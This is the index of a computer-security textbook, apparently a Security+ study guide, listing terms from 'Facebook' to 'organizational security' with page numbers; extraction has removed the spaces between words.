FFacebook,problemofsharingtoomuchinformation,57FACTA(FairandAccurateCreditTransactionsAct),725fail-safedefaults,SaltzerandSchroeder’seightprinciplesofsecuritydesign,26
FairCreditReportingAct(FCRA),725fakeURL,client-sideattacks,494falsenegatives
IDSs,382physicalaccesscontrols,213–214
falsepositivesIDSs,382physicalaccesscontrols,213–214
FamilyEducationRecordsandPrivacyAct(FERPA),721faulttolerance,269,599–600FC(FibreChannel),247
FCoE(FibreChanneloverEthernet),247FCRA(FairCreditReportingAct),725FDDI(FiberDistributedDataInterface),224FederalInformationProcessingStandardsPublications(FIPS),183FederalTradeCommission.SeeFTC(FederalTradeCommission)fences,inphysicalsecurity,195FERPA(FamilyEducationRecordsandPrivacyAct),721FiberCableCut,4FiberDistributedDataInterface(FDDI),224fiber-opticcable,275–276FibreChannel(FC),247FibreChanneloverEthernet(FCoE),247filepermissions
inMacOSX,422securitytemplatesand,453inUNIX,302
filesharing,IM(instantmessaging)and,523FileTransferProtocol.SeeFTP(FileTransferProtocol)FileTransferProtocolSecure(FTPS),322–323fileviewers,toolsforcomputerforensics,682files
encrypting,439hostforensics,685–687
FileVault,hardeningMacOSX,422filters
antispamproducts,430–431content-filteringproxy,270internetcontentfilters,272MACfiltering,359URLfilters,272
FIPS(FederalInformationProcessingStandardsPublications),183
firesuppressionfiredetection,207–208fireextinguishers,206–207organizationalsecurity,64
firewallsapplicationfirewalls,458auditingfirewallrules,499dealingwithunauthorizedaccess,282e-mailand,505hardeningMacOSX,422howtheywork,261–263integratedintohost-basedIPS,394locationofNIDSrelativeto,384–385next-generationfirewalls,263overviewof,260–261securitymethodsworkingagainsteachother,31softwarefirewalls,435–436webapplicationfirewallsvs.networkfirewalls,264WindowsFirewall,413,436
firmwareupdate,442versioncontrol,458
firstrespondersinforensicinvestigation,679inincidentresponse,660–661
Flame,currentthreatenvironment,5–6flashcards,typesofelectronicmedia,280flatnetworks,243floppydisks
bootdiskattacks,192–194typesofmagneticmedia,278
FOIA(FreedomofInformationAct),720–721footprintingattacks,typesofoldschoolattacks,652forensics.Seealsocomputerforensics
defined,674forensicimages,194,983forensicprograms,682forensicworkstations,681,682makingsecuritymeasurable,669–670
fragmentation,packet,225–226frames,EthernetandFrameRelay,225FrameworkforImprovingCriticalInfrastructureCybersecurity,21–22fraud.SeealsoCFAA(ComputerFraudandAbuseAct),697freespace,systemforensicsand,686FreedomofInformationAct(FOIA),720–721FTC(FederalTradeCommission)
CAN-SPAM(ControllingtheAssaultofNon-SolicitedPornographyandMarketingAct),514
enforcingSafeHarbor,729redflagrules,726roleincomputercrime,699
FTP(FileTransferProtocol)incommunicationbetweenclientandserver,322–323overviewof,540retrievingcertificatesfromrepositories,170
FTPS(FileTransferProtocolSecure),322–323fullbackup,592fulldiskencryption,438–439fullduplexmode,switches,257fuzzing
overviewof,571intestingphaseofsoftwaredevelopment,567–568
usebyhackers,493
Ggames
hardeninggameconsoles,457installingunauthorizedhardwareorsoftware,82
Ganttcharts,toolsforriskmanagement,626Gatekeeperapplication,hardeningMacOSX,422gates,inphysicalsecurity,195gateways,270generalriskmanagementmodel
assetidentification,616controldesignandevaluation,617impactdeterminationandquantification,617residualriskmanagement,618threatassessment,616–617
generators,utilityandpowerinterruptionsand,598geo-tagging,locationservices,370GhostNet,5GLBA(Gramm-Leach-BlileyAct)
governingcollectionofinformation,719overviewof,702–703privacyfeaturesof,724
GlobalPositioningSystem(GPS),364globallyuniqueidentifiers(GUIDs),450GnuPG,123goals,ofincidentresponse,654GPG(GNUPrivacyGuard),123,180GPOs(grouppolicyobjects)
domainpasswordpolicy,293
hardeningWindowsOSs,416systemhardening,450–451
GPS(GlobalPositioningSystem),364Gramm-Leach-BlileyAct.SeeGLBA(Gramm-Leach-BlileyAct)graphicaluserinterfaces(GUIs),418grey-boxtesting,567greylisting,inblockingspam,516GroupPolicy
accesscontrolpolicies,32–33referencingwithGUIDs,450systemhardening,450–452
grouppolicyobjects(GPOs).SeeGPOs(grouppolicyobjects)groups
Administratorsgroup,291auditing,290grouplevelauthentication,291–292overviewof,291–292securitytemplatesrestricting,453
guards,inphysicalsecurity,196guidelines,security,43–44GUIDs(globallyuniqueidentifiers),450GUIs(graphicaluserinterfaces),418
Hhackers/hacking
basicsecurityterminology,19black-hatandwhite-hat,497defined,9pros/consofhiring,48
hacktivistattacks,onspecifictargets,12
halon-basedfiresuppressionsystems,205–206handshake,TCP,228–229handshake,TLS,533harddrives
encryptionservicesof,438toolsforcomputerforensics,682typesofmagneticmedia,278
hardeningapplications.Seeapplications,hardeningdefined,408hosthardening.SeehosthardeningOSs(operatingsystems),240systemhardening.Seesystemhardening
hardwareencryptiondevices,437–438installingunauthorized,81–82securing,436–437
hardwaresecuritymodules(HSMs)hardwareencryptiondevices,438safeguardingcryptographickeys,147–148
hashvaluesindetectingintrusion,411hashingfunctionsand,99
hashingalgorithmsensuringforensicdataisnotmodified,685integrityand,116IPsecusing,327MD(MessageDigest),101–102overviewof,99–100RIPEMD(RACEIntegrityPrimitivesEvaluationMessageDigest),101
SHA(SecureHashAlgorithm),100–101summary,102–103typesofencryptionalgorithms,96
Haystack,377hazards,611HD(high-definition)opticalmedia,280headermanipulation
client-sideattacks,494violatingCAN-SPAMact,701
headersclient-sideattacks,554ine-mailstructure,506–508spamfilteringand,430
HealthInformationTechnologyforEconomicandClinicalHealthAct(HITECH),723–724
HealthInsurancePortabilityandAccountabilityAct(HIPAA),723–724hearsayrule,rulesofevidence,677Heartbleedvulnerability
inOpenSSLcryptography,79passworwwdsand,297
heating,ventilation,andairconditioning.SeeHVAC(heating,ventilation,andairconditioning)
Hellman,Martin,109–110heuristicscanning,antivirusproducts,427–428hexcharacters,570hiddenfiles,systemforensicsand,686HIDSs(host-basedIDSs)
activeandpassive,393advancedcapabilities,393–394advantages/disadvantages,391–393defined,378
overviewof,388–391securitydevices,267
hierarchicaltrustmodel,155–157highavailability,599–600HighSpeedPacketAccess(HSPA)
3Gmobilenetworks,342demandfordataservicesand,339
highlystructuredthreats,informationwarfareas,11hijackingattacks.SeeTCP/IPhijackingHIPAA(HealthInsurancePortabilityandAccountabilityAct),723–724hiringpolicies,48HITECH(HealthInformationTechnologyforEconomicandClinicalHealthAct),723–724
HMAC,IPsecusing,327HMAC-basedOne-TimePassword(HOTP),117hoaxes
e-mail,513–514securityofe-mailand,509socialengineeringattacks,77–78viruses,468
honeynets,397honeypots,396–397host-basedIDSs.SeeHIDSs(host-basedIDSs)hostforensics
filesystems,685–687Linuxmetadata,688overviewof,685Windowsmetadata,687–688
hosthardening,427–430antimalware,426–427antispam,430–431
antispyware,431–432AppLocker,434hardeningMacOSX,421–423hardeningUNIX/LinuxOSs,417–421hardeningWindowsOSs,413–417hardwaresecurity,436–437host-basedfirewalls,435–436host-basedsecuritycontrols,437–440hotfixes,servicepacks,andpatches,423–426machinehardening,411operatingsystemsecurityand,412overviewof,410–411pop-upblockers,432–433softwarebaselining,437TrustedOSs,434–435whitelistingandblacklistingapplications,434WindowsDefender,431–432
hostscalculating,238CompTIASecurity+ExamObjectives,749–752securityapproaches,23virtualizationprovidingavailabilityandelasticity,254–255vulnerabilityscanners,448–449
hotsites,alternativebackupsites,597hotfixes,hosthardening,423–426HOTP(HMAC-basedOne-TimePassword),117HSMs(hardwaresecuritymodules)
hardwareencryptiondevices,438safeguardingcryptographickeys,147–148
HSPA(HighSpeedPacketAccess)3Gmobilenetworks,342
demandfordataservicesand,339HSTS(HTTPStrictTransportSecurity),538–539HTML(HypertextMarkupLanguage),530HTTP(HypertextTransferProtocol)
fordatatransferoverweb,537–539headermanipulation,554Internetservices,242retrievingcertificatesfromrepositories,170webapplicationfirewallsand,264
HTTPStrictTransportSecurity(HSTS),538–539HTTPSEverywhere,538HTTPS(HTTPSecure)
fordatatransferoverweb,537–539SSLand/orTLSusedwith,182webapplicationfirewallsand,264
hubs,257–258humanresourcespolicies,47–53HVAC(heating,ventilation,andairconditioning)
environmentalcontrols,204environmentalissues,63–64hardeningembeddedsystems,455
hybridclouds,284hybrid(mixed)topology,223hybridpasswordattacks,492hybridtrustmodel,159–160HypertextMarkupLanguage(HTML),530HypertextTransferProtocol.SeeHTTP(HypertextTransferProtocol)
IIaaS(InfrastructureasaService)
cloudcomputingand,284overviewof,599
IC3(InternetCrimeComplaintCenter),698ICMP(InternetControlMessageProtocol)
inIPv6,226messagecodes,230–231overviewof,229–231preventingattacksof,476pros/consofblock,231
ICS(industrialcontrolsystems),454IDbadges,211IDEA(InternationalDataEncryptionAlgorithm)
IPsecusing,327PGPand,181SSHand,322symmetricencryptionalgorithms,107–108WTLSsupporting,340
identitymanagement.Seealsoauthentication,305–306identitytheft,725IdentityTheftandAssumptionDeterrence,719IDs.SeeuserIDsIDSs(intrusiondetectionsystems)
activevs.passivetools,402–403bannergrabbing,403–404comparedwithIPSs,396falsenegativesandfalsepositives,382historyof,377–378honeypots/honeynets,396–397host-based.SeeHIDSs(host-basedIDSs)models,379–381network-based.SeeNIDSs(network-basedIDSs)
innetworksecurity,24overviewof,376,378–379portscanner,400–402protocolanalyzers,398–399reviewandQ&A,405–407securitydevices,267securityperimeterand,60signatures,381–382SPAN(SwitchedPortAnalyzer),400tools,398inUTMsystem,272
IE(InternetExplorer).Seealsobrowsers,433IEEE802.11
attacks,350–354overviewof,347–348speedandfrequencyrangesfor802.11family,337variousstandards,348–350wirelessstandard,65
IEEE802.1Ximplementing,357–359remoteaccessmethods,311–312wirelessprotocols,312
IEEE802.3.SeealsoEthernet,233IEEE(InstituteforElectricalandElectronicsEngineers),codeofethics,48IETF(InternetEngineeringTaskForce)
PKIXstandard,134PKIXstandards,168–170S/MIMEstandard,178–179SSL/TLSstandard,532TLSworkinggroup,173
IGMP(InternetGroupManagementProtocol),226
IISmanagementinterface,hardeningWindowsServer2008,414IKE(InternetKeyExchange),175,329ILOVEYOUworm,3,512IM(instantmessaging)
comparedwithe-mail,510modernsystemsfor,524–525overviewof,522–524securing,524
IMAP(InternetMessageAccessProtocol),505impacts
incalculatingrisks,624defined,610determininginriskmanagementmodel,617
implicitdeny,fail-safedefaults,26in-vehiclecomputersystems,hardening,457incidentmanagement
defined,642riskmitigationand,615
incidentresponsecyberkillchainin,669defined,651DOJbestpractices,667–668establishingmanagementteamfor,651–652follow-up/lessonslearned,666–667forensicscomparedwith,675foundationsof,651goalsof,654identificationanddetectionphasesof,659–660implementingsecuritymeasures,658–659initialresponsephase,660–661investigationphase,664–665
IOCs(IndicatorsofCompromise),668–669isolatingincident,661–663metricsforsecurity,669–670NISTstandards,667overviewof,650planninganddeployingstrategies,663–664policiesandprocedures,54,655preparingfor,655–658processof,654–655recovery/reconstitutionprocedures,665–666reportingincident,666reviewandQ&A,671–673typesofattacks,652–654
incidentresponseteam,656–658incidents,defined,651increaseddatacenterdensity,204incrementalbackups,592–593IndicatorsofCompromise(IOCs),artifactsofintrusion,668–669industrialcontrolsystems(ICS),454information
criticalityinplanningincidentresponse,651OECDfairinformationpractices,727personallyidentifiable.SeePII(personallyidentifiableinformation)securitybasics,19
InformationSystemsAuditandControlAssociation(ISACA),612InformationSystemsSecurityAssociation(ISSA),48informationwarfare,10–11infrared(IR),276InfrastructureasaService(IaaS)
cloudcomputingand,284overviewof,599
infrastructure,PKIcentralizedanddecentralized,146–147overviewof,130
infrastructuresecurityBYODconcerns,369cloudcomputing,283–284coaxialcable,274concentrators,264contentandmalwareinspection,273devices,253DLP(datalossprevention),272electronicmedia,280–281fiber-opticcable,275–276firewalls,260–264FrameworkforImprovingCriticalInfrastructureCybersecurity,21–22
hubs,bridges,andswitches,257–258IDSs(intrusiondetectionsystems),267internetcontentfilters,272loadbalancers,269magneticmedia,282–283media,273,281–282mobiledevices,255modems,265–266monitoringanddiagnostics,268–269NAS(NetworkAttachedStorage),255–256networkaccesscontrol,267–268networkcomponents,256NICs(networkinterfacecards),256–257opticalmedia,279–280overviewof,252
PBX(privatebranchexchange),266physicalsecurityconcerns,282–283proxies,270–271removablemedia,277–278removablestorage,256reviewandQ&A,285–287routers,258–259threatstocriticalinfrastructure,11unguidedmedia,276–277URLfilters,273UTM(unifiedthreatmanagement),272–273UTP/STPcable,274–275virtualization,254–255VPNconcentrator,266–267websecuritygateways,271wirelessdevices,264–265
inhouseCAs,152–153initializationvector(IV)
inchosen-plaintextattack,340WEPweaknessbasedon,353–354
injectionattacksclient-sideattacks,494defendingagainst,575typesof,573–574
inlinenetworkdevices,395inlining,552input/outputvalidation,softwaredevelopmentand,568–571insiders
obtaininginsiderinformation,74–75typesofthreats,9–10
instantmessaging.SeeIM(instantmessaging)
InstituteforElectricalandElectronicsEngineers.SeeIEEE(InstituteforElectricalandElectronicsEngineers)
intangibleimpacts,impactdeterminationandquantification,617integeroverflowattacks,493,576IntegratedServicesDigitalNetwork(ISDN),318integrity
inCIA,20ofcode,643–644usesofcryptography,116WTLSand,340
integritymodelsBibamodel,36Clark-Wilsonmodel,36–37overviewof,35
intellectualpropertyrights,708–710interconnectionsecurityagreements(ISAs),59interfaces
GUIs(graphicaluserinterfaces),418securingmanagementinterfaces,443userinterfaceinIDSs,379
Internetcontentfilters,272internetusagepolicy,51networkarchitectures,221overviewof,241–242
InternetControlMessageProtocol.SeeICMP(InternetControlMessageProtocol)
InternetCrimeComplaintCenter(IC3),698InternetEngineeringTaskForce.SeeIETF(InternetEngineeringTaskForce)
InternetExplorer(IE).Seealsobrowsers,433
InternetGroupManagementProtocol(IGMP),226InternetKeyExchange(IKE),175,329InternetMessageAccessProtocol(IMAP),505InternetProtocol.SeeIP(InternetProtocol)InternetSecurityAssociationandKeyManagement(ISAKMP),174–175,327
InternetSmallComputerSystemInterface(iSCSI),247InternetworkOperatingSystem(IOS),Cisco,442InternetworkPacketExchange(IPX),224interoperabilityagreements,58–59interrelationshipdiagrams,toolsforriskmanagement,626intranet
networkarchitectures,221overviewof,242–243
intruderslayeredsecuritypreventing,29–30typesofthreats,9
intrusiondetectionsystems.SeeIDSs(intrusiondetectionsystems)intrusionpreventionsystems.SeeIPSs(intrusionpreventionsystems)investigation
conductingincomputerforensics,682–683phaseofincidentresponse,664–665rigorousnessofmethods,680–681stepsinforensicinvestigation,678
IOCs(IndicatorsofCompromise),artifactsofintrusion,668–669IOS(CiscoInternetworkOperatingSystem),442iOS,hardeningmobiledevices,456IPaddresses,236–238
attackson,487–488DNStranslatingnamesinto,235NATtranslatingprivateaddressesintopublic,238–239
spoofingattacks,480–481IP(InternetProtocol)
datagrams,226–227ICMP,229–231IPv4.SeeIPv4IPv6.SeeIPv6networkprotocol,224overviewof,226TCPvs.UDP,227–229
ipchains,host-basedfirewallsinLinuxOSs,435–436IPcomp(IPPayloadCompressionProtocol),183ipconfigcommand,inDNSpoisoning,489IPsec(IPSecurity)
configurations,325–326DHprotocolusedby,110implementingVPNs,266–267ISAKMPimplementationofkeyexchange,175overviewof,324–325protocols,327–329SAs(securityassociations),325transportandtunnelmodes,182–183
IPSs(intrusionpreventionsystems)comparedwithIDSs,396host-based,394overviewof,394–396inUTMsystem,272
iptables,host-basedfirewallsinLinuxOSs,435–436IPv4
datagrams,227vs.IPv6,231–232,443–444
IPv6
datagrams,227IGMPreplacedbyICMPandMLD,226securityconcerns,232vs.IPv4,443–444
IPX(InternetworkPacketExchange),224IR(infrared),276ISACA(InformationSystemsAuditandControlAssociation),612ISAKMP(InternetSecurityAssociationandKeyManagement),174–175,327
ISAs(interconnectionsecurityagreements),59iSCSI(InternetSmallComputerSystemInterface),247ISDN(IntegratedServicesDigitalNetwork),318iSKORPiTX,3ISO(InternationalOrganizationforStandardization)
implementingsecuritypolicies,184–185OSImodel,224–225
isolationofsystem,approachestosecurity,13ISSA(InformationSystemsSecurityAssociation),48ITcontingencyplanning,589ITorganizations,separationofdutiesin,638IV(initializationvector)
attack,352inchosen-plaintextattack,340WEPweaknessbasedon,353–354
Jjailbreaking,exceedingprivileges,456Java,542–543JavaVirtualMachines(JVMs),543JavaScript,544–545
“Jester,”2jobrotationpolicies,48JVMs(JavaVirtualMachines),543
KKaliLinuxtoolset,496KEA(KeyExchangeAlgorithm),179keystretching
Bcrypt,120overviewof,118–119PBDDF2(Password-BasedKeyDerivationFunction2),119
KeyCertSign,X.509digitalcertificateextensions,135KeyEncipherment,X.509digitalcertificateextensions,135keylogging,attackertechniques,471keys
inasymmetricencryption,109comparingpublicandprivatekeys,130incontemporaryencryption,96–97destroyingkeypairs,142electronickeyexchange,111ephemeralkeys,119exhaustivesearchofkeyspaceinattacksonencryption,487HSMssafeguarding,147–148ISAKMPimplementingkeyexchange,174–175keyarchiving,150keyescrow,118–119,150–151keymanagementandexchangeprotocols,327,329keypairsincontemporaryencryption,96keyrecovery,149–150mobileapplicationsecurity,371
privatekeyprotection,148–149quantumkeydistribution,114sessionkeysinsymmetricencryption,119sharingkeystore,133storingcritical,148insymmetricencryption,103,117–118TPM(TrustedPlatformModule),98weakDESkeys,104
keyspace,comparativestrengthandperformanceofalgorithms,93killcommand,stoppingrunningservicesonUNIXOSs,418Kismet,sniffersusedinattacksonIEEE8082.11,352
LL2TP(Layer2TunnelingProtocol),320–321languagefilters,antispamproducts,430LANs(localareanetworks),221laptops,theftof,201“lastmile”problem,277laws.SeelegalissuesLayer1(physicallayer),OSI,hubsoperatingat,257Layer2(datalinklayer),OSI
bridgesandswitchesoperatingat,257–258EthernetandLayer2addresses,233
Layer2TunnelingProtocol(L2TP),320–321layer3(networklayer),OSImodel,routersoperatingat,258layeredaccess,inphysicalsecurity,197layeredsecurity,defenseindepth,29–30LDAP(LIghtweightDirectoryAccessProtocol)
certificaterepositories,143injectionattacks,574
overviewof,539SSL/TLSfunctionsfor,539–540
LE(LowEnergy),Bluetoothfeatures,345LEAP(LightweightExtensibleAuthenticationProtocol),357leastcommonmechanism,SaltzerandSchroeder’seightprinciplesofsecuritydesign,28
leastprivilegeapplyingtosoftwaredevelopment,563SaltzerandSchroeder’seightprinciplesofsecuritydesign,24–25
LeastSignigicantBit(LSB),steganography,114–115legalissues
BYODconcerns,368–369CAN-SPAM(ControllingtheAssaultofNon-SolicitedPornographyandMarketingAct),701–702
CFAA(ComputerFraudandAbuseAct),701compliancewithsecurity-relatedlaws,56computertrespass,699ConventiononCybercrime,699–700cybercrime,697–698digitalsignaturelaws,706–708DRM(digitalrightsmanagement),708–710ECPA(ElectronicCommunicationsPrivacyAct),700–701GLBA(Gramm-Leach-BlileyAct),702–703import/exportrestrictionsonencryption,705–706internationalprivacylaws.Seeprivacy,internationallawsoverviewof,696PCIDSS(PaymentCardIndustryDataSecurityStandard),703–704primarysourcesoflawsandregulations,698–699privacylaws,703reviewandQ&A,713–715significantU.S.laws,700
SOX(Sarbanes-OxleyAct),703U.S.privacylaws.Seeprivacy,U.S.lawsUSAPatriotAct,702
lessonslearned,incidentresponseand,666–667Levin,Vladimir,2LightweightExtensibleAuthenticationProtocol(LEAP),357linearcryptanalysis,91LinkedIN,57LinuxOSs
forensicsappliedtometadata,688GroupPolicy,32–33hardening,419–421patches,426softwarepackageupdateutility,425
LiveCDs,193,202Lloyd,Timothy,2loadbalancing
faulttolerancefrom,600–601overviewof,269
localareanetworks(LANs),221localregistrationauthorities(LRAs),132–133LocalSecurityPolicyutility(secpol),450locallysharedobjects(LSOs),assecurityorprivacythreat,577locateservice,XKMS,177locationawareness,GroupPolicyproviding,451locationservices,mobiledevices,370lockout,mobiledevicesecurity,363locks
masterkeysand,210physicalaccesscontrols,62,196–197securinghardware,437
logicbombs,471logon
logging,391restrictions(timeofday),295
logsevidence,682logon,391
LongTermEvolution(LTE),comparingwith3Gand4G,342loopprotection,switchesand,258LoveLettervirus,3LowEnergy(LE),Bluetoothfeatures,345Low-Water-Markpolicy,Bibasecuritymodel,36LRAs(localregistrationauthorities),132–133LSB(LeastSignigicantBit),steganography,114–115LSOs(locallysharedobjects),assecurityorprivacythreat,577LTE(LongTermEvolution),comparingwith3Gand4G,342
MMACfiltering,359MACfloodingattacks,258MAC(mandatoryaccesscontrol)
comparingwithMediaAccessControl,234inMacOSX,422overviewof,301
MAC(MediaAccessControl)addresseslocalpacketdelivery,233–234NICsand,256–257packetdeliveryand,233remotepacketdelivery,234–235rogueaccesspointsexploiting,353
MacOSX,hardening,421–423machinehardening,411macroviruses,467–468MACs(messageauthenticationcodes),340magicnumber,forfileidentificationinforensics,687magneticmedia,278–279maildeliveryagent(MDA),506mailrelaying,sendingspamvia,515mailtransferagent(MTA),e-mailagents,506mailuseragent(MUA),e-mailagents,506mainframes,hardening,456–457malware(maliciouscode).Seealsobyindividualtypes
adware,471–472antimalwareproducts,426–427backdoorsandtrapdoors,472–473botnets,471–472browsers,551defenses,473–474
defined,7detectionandprevention,394e-mail,510–513logicbombs,471maliciousadd-ons,551overviewof,466polymorphicmalware,469ransomware,473rootkits,470–471spyware,471Trojanhorses,470UTMappliancesformalwareinspections,273viruses,466–468websecuritygatewaysprotectingagainst,271worms,469
man-in-the-middleattacksdefeatingkeyexchangebyinterceptingkey,97eviltwinattacksand,352overviewof,483–484publickeysand,129sessionhijacking,553SSL/TLS,534,536
ManagedServiceAccounts,hardeningWindowsServer2012,415managementinterfaces,securing,443managementteam,establishingforincidentresponse,651–652mandatoryaccesscontrol.SeeMAC(mandatoryaccesscontrol)MANs(metropolitanareanetworks),221mantraps,preventingtailgating,198masterkeys,locksand,210MaximumTransmissionUnit(MTU),packets,225MBSA(MicrosoftBaselineSecurityAnalyzer),448–450
MD(MessageDigest)MD5ensuringdataisnotmodified,685MD5supportedbyWTLS,340MD5usedforSSL/TLSencryption,533overviewof,101–102
MDA(maildeliveryagent),506MDM(mobiledevicemanagement),363,365meantimebetweenfailures(MTBF),600,624meantimetofailure(MTTF),625meantimetorecovery(meantimetorestore),601meantimetorepair(MTTR),624media
coaxialcable,274disposalanddestructionpolicies,46–47electronicmedia,280–281fiber-opticcable,275–276magneticmedia,282–283opticalmedia,279–280overviewof,273physicalsecurityconcerns,282–283removable,277–278scanningforviruses,428securityconcerns,281–282unguidedmedia,276–277UTP/STPcable,274–275
MediaAccessControladdresses.SeeMAC(MediaAccessControl)addresses
Melissavirus,2–3memorandumofunderstanding(MOUs),interoperabilityagreements,59memorysticks,280mesharchitecture
ofCAs,158–159wirelessnetworks,223
messageauthenticationcodes(MACs),340MessageDigest.SeeMD(MessageDigest)messageencryption,servicesprovidedbyS/MIME,178messageintegrity,usesofcryptography,116metadata
inhostforensics,687–688innetworkforensics,689
metamorphicmalware,466Metasploittoolset,496metrics
makingsecuritymeasurable,669–670training,58
metropolitanareanetworks(MANs),221microSDcards,280MicrosoftBaselineSecurityAnalyzer.SeeMBSA(MicrosoftBaselineSecurityAnalyzer)
MicrosoftManagementConsole(MMC),SecurityTemplatessnap-in,453MicrosoftOutlook,S/MIMEoptionsin,519–520microwavelinks,RFwavesand,277MIDAS(MulticsIntrusionDetectionandAlertingSystem),377MIME(MultipurposeInternetMailExtensions)protocoland,508–509Mimikatztoolset,492MIMO(multiple-inputmultipleoutput)
antennaplacementand,361featuresinIEEE802.11,348–349
misusedetectionmodel,IDSmodels,380mitigation
dataminimizationand,658defined,611
riskmanagement,614–615,628–629Mitnick,Kevin,2MITRE
oncodingvulnerabilities,563makingsecuritymeasurable,669–670securitymanagementenumerationsandstandards,578standardsassociatedwithIOCs,669
MLD(MulticastListenerDiscovery),inIPv6,226MMC(MicrosoftManagementConsole),SecurityTemplatessnap-in,453mobileapplicationsecurity,370–372mobiledevicemanagement(MDM),363,365mobiledevices
applicationsecurity,370–372BYOD(BringYourOwnDevice)concerns,366–370encrypting,439hardening,455–456infrastructuresecurityand,255locationservices,370mobilephones,338–340overviewof,362securing,363–366
models,IDSs,379–381models,riskmanagement
applying,619generalmodel,616–618NISTmodels,618–619SEImodel,618
modems(modulator/demodulator),265–266monitoring
CCTV(closedcircuitTV)for,198–199content,271
networks,268–269,665ports,400
Morriswormbuffer-overflowattacks,575historicalsecurityincidents,2
MOUs(memorandumofunderstanding),interoperabilityagreements,59MTA(mailtransferagent),e-mailagents,506MTBF(meantimebetweenfailures),624MTTF(meantimetofailure),625MTTR(meantimetorepair),624MTU(MaximumTransmissionUnit),packets,225MUA(mailuseragent),e-mailagents,506MulticastListenerDiscovery(MLD),inIPv6,226MulticsIntrusionDetectionandAlertingSystem(MIDAS),377multifactorauthentication,310multipleencryption,3DESasexampleof,104multiple-factorauthentication,214–215multiple-inputmultipleoutput(MIMO)
antennaplacementand,361featuresinIEEE802.11,348–349
MultipurposeInternetMailExtensions(MIME)protocoland,508–509multitasking,hardeningMacOSX,422multpartitenature,ofmalware,466mutualaidagreements,alternativebackupsites,597mutualauthentication,310
NNAC(NetworkAdmissionControl),268NADIR(NetworkAuditDirectorandIntrusionRepair),377NAP(NetworkAccessProtection)
controllingaccesstonetworks,267hardeningWindowsOSs,413–414
NAS(networkaccessserver),312NAS(NetworkAttachedStorage),255–256NAT(NetworkAddressTranslation),238–240,261nation-states
currentthreatenvironment,5–7typesofthreats,10–11
NationalInstituteofScienceandTechnology.SeeNIST(NationalInstituteofScienceandTechnology)
NationalWhiteCollarCrimeCenter(NW3C),698NDP(NetworkDiscoveryProtocol),232nearfieldcommunication(NFC),347needtoknowprinciple
Brewer-Nashmodel,35insecurity,46
Nessus,networkvulnerabilityscanner,448–449NetFlow
collectingnetworkdata,665innetworkforensics,689
NetRanger,monitoringnetworklinks,378NetStumbler,attacksonIEEE802.11,351–352networkaccesscontrol,267–268NetworkAccessProtection(NAP)
controllingaccesstonetworks,267hardeningWindowsOSs,413–414
networkaccessserver(NAS),312NetworkAddressTranslation(NAT),238–240,261NetworkAdmissionControl(NAC),268networkanalyzers.Seesniffers/sniffingNetworkAttachedStorage(NAS),255–256
NetworkAuditDirectorandIntrusionRepair(NADIR),377network-basedIDSs.SeeNIDSs(network-basedIDSs)network-basedintrusiondetection,267NetworkDiscoveryProtocol(NDP),232networkfabric,flatnetworks,243networkhardening
deviceconfiguration,442–443IPv4vs.IPv6,443–444overviewof,441securingmanagementinterfaces,443softwareupdates,442VLANmanagement,443
networkinterfacecards(NICs)overviewof,256–257promiscuousmode,383–384,398
networklayer(layer3),OSImodel,routersoperatingat,258networkoperatingsystems(NOSs),410networkoperationscenter(NOC),268–269networksegmentation,limitingcommunicationbetweendevices,457–458networks/networking
accesscontrol,267–268architectures,221–222CompTIASecurity+ExamObjectives,738–740concentrators,264contentandmalwareinspection,273contentfilters,272datagrams,226–227DLP(datalossprevention),272DMZ(demilitarizedzone),240–241enclaves,243–244extranet,242–243
firewalls,260–264flatnetworks,243forensics,689hubs,bridges,andswitches,257–258ICMP(InternetControlMessageProtocol),229–231IDSs(intrusiondetectionsystems),267Internet,241–242intranet,242–243IPaddressesandsubnetting,236–238IP(InternetProtocol),226IPv4vs.IPv6,231–232loadbalancers,269modems,265–266monitoringanddiagnostics,268–269,665NAT(NetworkAddressTranslation),238–240networktapsbyprotocolanalyzers,399NICs(networkinterfacecards),256–257overviewof,220,256packetdelivery,233–236packets,225–226PBX(privatebranchexchange),266protocols,223–225proxies,270–271reviewandQ&A,248–251routers,258–259securityapproaches,24securitybasics,19securityzones,240TCPvs.UDP,227–229topologies,222–223tunneling,246–247
URLfilters,273UTM(unifiedthreatmanagement),272–273VLANs,244–246VPNconcentrator,266–267vulnerabilityscanners,448websecuritygateways,271wirelessdevices,264–265
next-generationfirewalls,263NFC(nearfieldcommunication),347NICs(networkinterfacecards)
overviewof,256–257promiscuousmode,383–384,398
NIDSs(network-basedIDSs)activeandpassiveNIDSs,387advantages/disadvantages,386–387defined,378overviewof,382–386tools,387–388
NIST(NationalInstituteofScienceandTechnology)definitionofincidentresponse,655DESstandard,104FIPSstandards,183FrameworkforImprovingCriticalInfrastructureCybersecurity,21–22
publicationsrelatedtocomputersecurity,667riskmanagementmodel,618–619
nmapfingerprintingoperatingsystemwith,652portscanners,444
NOC(networkoperationscenter),268–269nonrepudiation
basicsecuritygoals,20usesofcryptography,117X.509digitalcertificateextensions,135
NorthKorea,Sonyhackand,7NoSQLdatabase,vs.SQLdatabase,579NOSs(networkoperatingsystems),410notice,inresponsiblecollectionofPII,719notification,incidentresponseand,663NPP(NoticeofPrivacyPractices),723nslookupcommand,inDNSpoisoning,488–489NTLM(NTLANManager),320nullsessions(WindowsOSs),478NW3C(NationalWhiteCollarCrimeCenter),698
OOakley,keymanagementandexchange,327obfuscation,approachestosecurity,13OCSP(onlinecertificatestatusprotocol),142OECD(OrganizationforEconomicCo-operationandDevelopment),727OFDM(orthogonalfrequencydivisionmultiplexing),348–349oldschoolattacks,651–652OmegaEngineering,2omnidirectionalantennas,359on-boarding/off-boarding,BYODconcerns,368one-timepads,96onlinecertificatestatusprotocol(OCSP),142opendesign,SaltzerandSchroeder’seightprinciplesofsecuritydesign,27–28
openproxy,270–271openrelays,sendingspamvia,515
OpenShortestPathFirst(OSPF),442OpenSystemInterconnectionmodel.SeeOSI(OpenSystemInterconnection)model
OpenVulnerabilityandAssessmentLanguage(OVAL),578OpenWebApplicationSecurityProject(OWASP)
sessionmanagementcheatsheet,22web-basedvulnerabilitiesand,553
OpenIOCstandard,669OpenPGPstandard
alternativestoPGP,180GnuPGandGPG,123
OpenSSLcryptography,79OperationAurora,5OperationBotRoast,3–4OperationNightDragon,7operationalmodelofcomputersecurity,20,72operationalsecurity.Seeorganizationalsecurityoperations,continuityof,587opt-in/opt-outapproachestoprivacy,inU.S.andEurope,727opticalmedia,279–280OrganizationforEconomicCo-operationandDevelopment(OECD),727organizationalsecurity
